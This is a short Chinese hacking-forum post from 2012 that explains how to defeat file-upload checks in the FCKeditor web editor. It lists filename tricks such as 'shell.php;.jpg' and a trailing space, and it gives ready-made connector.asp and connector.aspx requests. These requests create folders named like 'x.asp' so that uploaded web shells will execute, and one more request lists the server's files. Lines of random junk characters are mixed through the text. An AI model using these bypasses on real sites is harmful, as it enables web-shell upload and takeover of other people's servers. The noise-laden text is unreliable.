很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
% K4 E3 B0 P+ O k: {- s5 X# F$ X/ R7 g% n7 ~: y
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。& d( K* u, _) G) \% t1 e
( K) X4 c* {+ o% C
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
7 [( Q, {' Q9 j6 |# }: V7 _0 Y0 ~3 n% Y/ L/ |
突破建立文件夹:
[9 l$ F! Z; _) u* B. ~
0 |0 O8 ~; L" b$ I4 x. Beditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
# Q2 }9 V/ {0 B" t" k/ v0 b9 x: r0 z
参数:! P, X- r3 ?0 A* i" l: a I
0 b, ?2 o$ J) a; F1 K6 L* i# c当前目录名:CurrentFolder=/qing.asp) C$ @( o3 g5 c D! q
# a- n3 E& r+ Z* g! d& L# H$ B2 b6 @
新的目录名:NewFolderName=x.asp8 d4 g) t7 s: Z
% N% e0 n- g0 z- G7 `
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
0 `+ ]7 K# t# Y+ ]: A9 T0 [
9 E5 q- S e* a# i那么 x.asp 就已经建立生成了,此方法百试百灵!
3 S4 L& c8 g" v ~5 N, ^+ r/ h6 ^6 T& z
新建文件夹参数 x.asp,基本都能搞定。
! X5 U9 w, H* G: \. @
( N0 i/ L. V9 d# B( h下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
* p0 H8 m3 f. J, Q2 ~! M; U4 \9 X; @# q6 Y/ D
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
. K- D* ?4 i! H8 \$ S8 H
v6 i; G W( d* p$ S获取文件列表/ n% j' N6 |( P' j
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F5 S2 B1 U6 G( \( F' ~8 a' K
- ?6 \4 P, G' F! s9 d0 C
|
发表于 2012-12-31 09:27:09
收藏
支持
反对